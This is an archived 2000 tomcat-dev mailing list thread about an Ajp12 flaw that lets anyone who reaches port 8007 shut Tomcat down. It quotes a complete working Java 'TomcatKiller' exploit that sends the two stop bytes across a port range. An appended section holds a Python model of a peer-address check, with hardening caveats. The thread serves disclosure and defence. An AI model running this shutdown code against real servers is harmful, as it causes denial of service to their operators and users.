tomcat-dev mailing list archives

From cmanola...@yahoo.com
Subject Re: Tomcat Security Vulnerability
Date Thu, 05 Oct 2000 21:29:47 GMT
Hi,

AFAIK there is a check on Ajp12 to verify if the host sending the stop
request is the same as localhost - that means someone from outside
shouldn't be able to stop tomcat. IF this is not true - then there is a
problem in isSameAddress().

Regarding the ability to send requests on 8007 - the AJP12 requests are
identical with equivalent HTTP requests ( except that a binary format is
used ).

In any case, most OS allow you to set IP rules ( I know about Solaris -
Linux, BSD - ipfw, ipnat, etc ). This is not required.

It is easy to add special filters on the AJP12 protocol ( or AJP13 ).

The JNI adapter doesn't have this problem, but works only with IIS and NES
( latest Apache 2.0 requires changes in mod_jk, and we don't have them so
far).

Costin 


On Thu, 5 Oct 2000, Michael Percy wrote:

> All,
> Since I am uncertain how many of you check the tomcat-user list often, and I
> am not personally a Java developer, I wanted to get you all in the loop on
> this (and hopefully get some discussion going on a solution). What I am
> talking about is the "Tomcat Killer" thread on tomcat-user over the past
> hour. I have pasted in the mentioned thread below, in hopes that the people
> who can do something about it (the developers) will have comments on it. I am
> also curious as to whether or not ajpv13 is susceptible to this kind of
> attack, and am not sure how to go about finding out.
> 
> 
> Regards,
> 
> Michael Percy
> QA Automation Eng.
> Portera Systems
> 
> 
> > -----Original Message-----
> > From: Michael Percy [mailto:mpercy@portera.com]
> > Sent: Thursday, October 05, 2000 1:36 PM
> > To: 'tomcat-user@jakarta.apache.org'
> > Subject: RE: Tomcat Killer
> > 
> > 
> > I'd like to point out that many people who wish to run Tomcat (at home, on a
> > LAN, etc.) do not have a spare machine/router to filter packets. Plus, many
> > setups include multiple ports on which different connectors run (to keep
> > configurations separate, etc.) so one cannot just firewall 8007 and proclaim
> > all is well. This is very dangerous and should be changed/patched/upgraded!
> > If Tomcat requires a firewall to be run safely, then it is NOT a secure
> > product (it relies on the security of other, unrelated people and
> > products!). This must be taken care of.
> > 
> > On a related note, does anyone know if the JNI connector is susceptible to
> > this? If not, then this can be a short-term workaround (does it work yet?).
> > 
> > 
> > Regards,
> > 
> > Michael Percy
> > QA Automation Eng.
> > Portera Systems
> > 
> > 
> > > -----Original Message-----
> > > From: Josh Knowles [mailto:josh.knowles@worldwidepackets.com]
> > > Sent: Thursday, October 05, 2000 1:27 PM
> > > To: 'tomcat-user@jakarta.apache.org'
> > > Subject: RE: Tomcat Killer
> > > 
> > > 
> > > You would think that as long as your firewall only allows access to port 80
> > > and or 8080 and not 8007 then you would be fine.  Nice find though.
> > > 
> > > Josh
> > > 
> > > -----Original Message-----
> > > From: Sean Schofield [mailto:sean@schof.com]
> > > Sent: Thursday, October 05, 2000 1:23 PM
> > > To: tomcat-user@jakarta.apache.org
> > > Subject: Re: Tomcat Killer
> > > 
> > > 
> > > Cool find!
> > > 
> > > Couldn't this be protected against by a firewall filtering incoming traffic
> > > so both Apache and Tomcat are behind a firewall to the Internet and
> > > another firewall between these servers and the LAN?  Then you would only
> > > have to worry about other servlets, etc. within the firewall messing things
> > > up.  And even then I think you need root to create sockets don't you?
> > > 
> > > Should this be posted to Bugtraq?
> > > 
> > > - schof
> > > 
> > > At 12:51 PM 10/5/00 -0700, you wrote:
> > > 
> > > >Hi all, just a word of warning about Tomcat 3.1 and from what I can
> > > >tell, 3.2beta4.  Looking at the source code, if you're using Ajp12 for
> > > >the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
> > > >batch/shell file does its job by sending "exit please" bytes to
> > > >Tomcat.  It doesn't take much to spoof this, here's my TomcatKiller
> > > >class below.  Just guess a host and port which may have Tomcat
> > > >running, and over it goes...
> > > >
> > > >I patched the sources so hopefully it won't happen to me ;)
> > > >
> > > >
> > > >import java.net.*;
> > > >import java.io.*;
> > > >
> > > >public class TomcatKiller {
> > > >
> > > >         static public void main( String[] args ) {
> > > >
> > > >                 // The two bytes the "Stop Tomcat" script sends over Ajp12
> > > >                 final byte SIGNAL = (byte)254;
> > > >                 final byte BYEBYE = (byte)15;
> > > >                 byte[] msg = { SIGNAL, BYEBYE };
> > > >
> > > >                 // Port range to try; defaults to the usual Ajp12 port
> > > >                 int min = 8007, max = 8007;
> > > >                 String host = args[0];
> > > >
> > > >                 try {
> > > >                         if( args.length > 1 )
> > > >                                 min = max = Integer.parseInt( args[1] );
> > > >                         if( args.length > 2 )
> > > >                                 max = Integer.parseInt( args[2] );
> > > >                         if( min > max ) {
> > > >                                 int tmp = min;
> > > >                                 min = max;
> > > >                                 max = tmp;
> > > >                         }
> > > >                         // Walk the range; stop at the first port that accepts
> > > >                         for( int i = min; i <= max; i++ ) {
> > > >                                 try {
> > > >                                         Socket s = new Socket( host, i );
> > > >                                         OutputStream os = s.getOutputStream();
> > > >                                         os.write( msg );
> > > >                                         os.flush();
> > > >                                         s.close();
> > > >                                         break;
> > > >                                 } catch( ConnectException ce ) {
> > > >                                         System.err.println( "conn refused " + i );
> > > >                                 } catch( IOException ioe ) {
> > > >                                         ioe.printStackTrace();
> > > >                                         break;
> > > >                                 }
> > > >                         }
> > > >                 } catch( Exception e ) {
> > > >                         e.printStackTrace();
> > > >                         System.exit( 1 );
> > > >                 }
> > > >         }
> > > >}
> > > >
> > > >// eof
> > > >
> > > >
> > > >stu
> > > >
> > > >
> > > >--
> > > >Stuart Maclean, Research Associate
> > > >University of Washington
> > > >ITS Research Program, College of Engineering
> > > >Box 352500
> > > >Seattle, WA 98195-2500
> > > >Tel: (206) 543-0637
> > > >http://www.its.washington.edu
> > > 
> > 
> 
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: tomcat-dev-unsubscribe@jakarta.apache.org
> For additional commands, e-mail: tomcat-dev-help@jakarta.apache.org
> 
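The check Costin describes (honour the Ajp12 stop command only when the peer is this machine), modelled as an added example. This is not Tomcat's code and not code from anyone in the thread: the two bytes 0xFE 0x0F are taken from the TomcatKiller class above, while the function names (is_same_address, handle_first_bytes) and the way local addresses are collected are this example's own assumptions about what a check like isSameAddress() has to do. The check_peer=False path shows the behaviour TomcatKiller relies on, for comparison.

```python
"""Model of the Ajp12 'stop Tomcat' peer check discussed in the thread.

Added example, not Tomcat's code. Only the two-byte stop message comes
from the thread (SIGNAL=254, BYEBYE=15 in TomcatKiller); everything else
here is an assumption about how such a check should be written.
"""
import ipaddress
import socket
from typing import Iterable

AJP12_SIGNAL = 0xFE   # first byte of an Ajp12 control message
AJP12_BYEBYE = 0x0F   # "exit please" control code
SHUTDOWN_MSG = bytes([AJP12_SIGNAL, AJP12_BYEBYE])


def is_shutdown_request(data: bytes) -> bool:
    """True when the first two bytes on a new connection are the stop command."""
    return data[:2] == SHUTDOWN_MSG


def collect_local_addresses() -> set:
    """Addresses that count as 'this host': loopback plus whatever the
    hostname resolves to. Resolution failure is tolerated so this works
    offline (assumption: loopback alone is enough for the stop script)."""
    addrs = {"127.0.0.1", "::1"}
    try:
        _, _, ips = socket.gethostbyname_ex(socket.gethostname())
        addrs.update(ips)
    except (socket.gaierror, socket.herror, OSError):
        pass
    return addrs


def is_same_address(peer: str, local_addrs: Iterable[str]) -> bool:
    """Honour a stop only if the connecting peer is this machine.

    Addresses are compared as parsed values, not strings, so an IPv4-mapped
    IPv6 peer ('::ffff:127.0.0.1') is treated the same as '127.0.0.1'.
    The peer address must be what the kernel reports for the socket
    (getpeername); nothing inside the message can be trusted for this."""
    try:
        p = ipaddress.ip_address(peer)
    except ValueError:
        return False                      # unparsable peer: never trust it
    if p.version == 6 and p.ipv4_mapped is not None:
        p = p.ipv4_mapped
    if p.is_loopback:
        return True
    for a in local_addrs:
        try:
            if ipaddress.ip_address(a) == p:
                return True
        except ValueError:
            continue
    return False


def handle_first_bytes(peer: str, data: bytes, local_addrs: Iterable[str],
                       check_peer: bool = True) -> str:
    """Decide what an Ajp12 listener should do with a new connection.

    Returns 'request' (not a stop command, hand off to normal processing),
    'refused' (stop command from a foreign host: log it and drop the
    connection) or 'shutdown'. check_peer=False is the unchecked behaviour
    that TomcatKiller exploits."""
    if not is_shutdown_request(data):
        return "request"
    if check_peer and not is_same_address(peer, local_addrs):
        return "refused"
    return "shutdown"


if __name__ == "__main__":
    # Constructed peers: a loopback client and a remote one (TEST-NET-2).
    local = collect_local_addresses()
    for peer in ("127.0.0.1", "::ffff:127.0.0.1", "198.51.100.7"):
        print(peer, "->", handle_first_bytes(peer, SHUTDOWN_MSG, local),
              "(unchecked:", handle_first_bytes(peer, SHUTDOWN_MSG, local,
                                                check_peer=False) + ")")
```

Two caveats a practitioner would keep in mind. An address check only says which host the bytes came from, not which user: any process on the same machine (another servlet, an unprivileged shell account; opening a client socket needs no special privilege on common systems) can still stop the server, so a shared secret carried in the stop message, or binding the Ajp12 listener to 127.0.0.1 where the web server is on the same host, narrows that further. And the comparison has to use the socket's actual peer address; comparing hostnames, or anything the client sends, would let a remote sender pass.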

